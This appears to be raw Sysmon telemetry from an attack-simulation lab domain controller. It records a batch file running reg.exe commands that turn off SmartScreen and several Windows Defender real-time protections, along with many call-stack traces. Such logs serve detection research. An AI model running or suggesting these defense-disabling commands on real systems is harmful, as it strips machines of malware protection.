12:04:38.881{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-3001-00000000AE01}4268C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.889{266CAFBE-6556-6064-3001-00000000AE01}4268C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 23542300x80000000000000009241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.834{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=517E7974341D60588A27DD3E99C8ECEF,SHA256=5338442443F6DB22FB72101E5E89E514B73A1DDF8759D3718E5838DA859FBB73,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.818{266CAFBE-6556-6064-2F01-00000000AE01}6720C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SmartScreenEnabledOff 10341000x80000000000000009239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.802{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2F01-00000000AE01}6720C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.802{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000009237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.802{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.802{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.802{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.802{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2F01-00000000AE01}6720C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.802{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2F01-00000000AE01}6720C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.812{266CAFBE-6556-6064-2F01-00000000AE01}6720C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.802{266CAFBE-6556-6064-2E01-00000000AE01}6560C:\Windows\system32\reg.exeHKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnableDWORD (0x00000001) 10341000x80000000000000009230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.802{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2E01-00000000AE01}6560C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2E01-00000000AE01}6560C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.787{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2E01-00000000AE01}6560C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.801{266CAFBE-6556-6064-2E01-00000000AE01}6560C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.787{266CAFBE-6556-6064-2D01-00000000AE01}6604C:\Windows\system32\reg.exeHKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtectionDWORD (0x00000001) 10341000x80000000000000009221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.787{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2D01-00000000AE01}6604C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.787{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.787{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2D01-00000000AE01}6604C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.787{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6556-6064-2D01-00000000AE01}6604C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.793{266CAFBE-6556-6064-2D01-00000000AE01}6604C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:38.787{266CAFBE-6556-6064-2C01-00000000AE01}6492C:\Windows\system32\reg.exeHKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoringDWORD (0x00000001) 23542300x80000000000000009212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.787{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DFE558161E273DC1DDE23559A1F5AE7,SHA256=6B446FD5BE5C6773C4EFC913D4A7ADA6BFDCB87D82B701C507F2C89B55E2256A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.771{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2C01-00000000AE01}6492C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 